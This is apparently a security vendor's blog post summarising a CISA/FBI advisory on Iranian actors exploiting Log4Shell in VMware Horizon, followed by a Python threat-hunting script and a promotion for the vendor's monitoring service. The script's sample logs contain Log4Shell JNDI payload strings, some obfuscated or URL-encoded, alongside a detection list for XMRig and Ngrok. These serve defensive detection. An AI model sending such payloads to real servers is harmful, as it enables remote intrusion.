During an incident response review, CISA observed suspected advanced persistent threat (APT) activity within a Federal Civilian Executive Branch (FCEB) network. “CISA determined that Iranian threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server.” These cyber threat actors were able to install XMRig crypto mining software, move laterally to the domain controller (DC), compromise credentials, and implant Ngrok reverse proxies on several hosts to maintain persistence.
CISA and the FBI released Cybersecurity Advisory (CSA) Alert AA22-320A to highlight ongoing Log4j vulnerability concerns on unpatched VMware systems. The alert advises that all organizations that did not apply patches or workarounds should assume they have been compromised, immediately begin threat hunting, and look for anomalous network behavior.
“If suspected initial access or compromise is detected based on IOCs or TTPs described in this CSA, CISA and FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems (including the DC), and audit privileged accounts. All organizations, regardless of identified evidence of compromise, should apply the recommendations in the Mitigations section of this CSA to protect against similar malicious cyber activity.”
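One way to start the hunt the advisory calls for, shown here as an added example that is not code from CISA, the FBI or SecuLore: a small Python script that normalizes web access-log lines (URL decoding plus the Log4j `lower`/`upper`/default-value lookup tricks used to disguise the string `jndi`) and flags any line that still carries a JNDI lookup, then checks a host process inventory for the XMRig and Ngrok tool names the advisory associates with this intrusion. All log lines, hostnames, addresses and process records are constructed samples.

```python
"""Threat-hunting helper for the Log4Shell -> XMRig -> Ngrok pattern described
in CISA/FBI alert AA22-320A. Added example; not code from CISA, the FBI or
SecuLore. Every log line and process record below is a constructed sample."""
import re
from urllib.parse import unquote

# Log4j "lower"/"upper" lookups and the empty-key default "${::-x}" are often
# nested inside a payload to hide the literal text "jndi" from naive matching,
# e.g. "${${lower:j}${::-n}di:ldap://...}". Each collapses to its argument.
_OBFUSCATION = re.compile(r"\$\{(?:(?:lower|upper):|::-)([^}]+)\}", re.IGNORECASE)
# The lookup prefix every Log4Shell attempt must resolve to before Log4j acts.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Tool names the advisory ties to post-exploitation (miner, reverse proxy).
_SUSPECT_TOOLS = ("xmrig", "ngrok")

# Constructed Apache-style access log lines (documentation IP ranges).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [15/Nov/2022:10:01:22 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Nov/2022:10:02:07 +0000] "GET / HTTP/1.1" 200 312 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [15/Nov/2022:10:02:09 +0000] "GET / HTTP/1.1" 200 312 "-" "${${lower:j}${::-n}di:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [15/Nov/2022:10:02:11 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.23%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
]

# Constructed (host, process name, command line) inventory records.
SAMPLE_PROCESSES = [
    ("horizon-web01", "java", "/opt/vmware/jre/bin/java -jar horizon.jar"),
    ("horizon-web01", "kthreadd", ""),
    ("horizon-web01", "xmrig", "./xmrig"),
    ("dc01.example.local", "svchost.exe", "C:\\Windows\\System32\\svchost.exe -k netsvcs"),
    ("dc01.example.local", "ngrok.exe", "C:\\Users\\Public\\ngrok.exe"),
]


def normalize(text: str) -> str:
    """Undo up to two layers of URL encoding, then collapse nested Log4j
    case/default lookups until the string stops changing; return lowercase."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(10):  # bounded: payloads nest only a few levels deep
        collapsed = _OBFUSCATION.sub(lambda m: m.group(1), text)
        if collapsed == text:
            break
        text = collapsed
    return text.lower()


def find_jndi_attempts(log_lines):
    """Return the access-log lines that contain a JNDI lookup after normalization."""
    return [line for line in log_lines if _JNDI_LOOKUP.search(normalize(line))]


def find_suspect_processes(process_records):
    """Return (host, process name) pairs whose name or command line mentions a
    tool named in the advisory (XMRig miner, Ngrok reverse proxy)."""
    hits = []
    for host, name, cmdline in process_records:
        haystack = f"{name} {cmdline}".lower()
        if any(tool in haystack for tool in _SUSPECT_TOOLS):
            hits.append((host, name))
    return hits


if __name__ == "__main__":
    for line in find_jndi_attempts(SAMPLE_ACCESS_LOG):
        print("JNDI lookup in request:", line)
    for host, name in find_suspect_processes(SAMPLE_PROCESSES):
        print(f"suspect process on {host}: {name}")
```

A hit in either list is reason to treat that host as compromised and, as the advisory says, to widen the investigation to connected systems including the DC and to audit privileged accounts. An empty result is not evidence of absence: access logs may have been rotated or edited, and a process snapshot only shows what was running at that moment, so the same checks belong in continuous monitoring rather than a one-off sweep.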
SecuLore™ OverWatch provides 24/7/365 network monitoring through our patented Paladin™ technology to detect vulnerabilities and anomalous behavior in your network. The technology passively captures all traffic on your network to identify threats that are often missed by other layers of security. The packet captures are sent to our Security Operations Center, where they are processed through a unique behavioral analysis that is constantly reviewed by our team of Certified Ethical Hackers (CEH).
SecuLore Support Team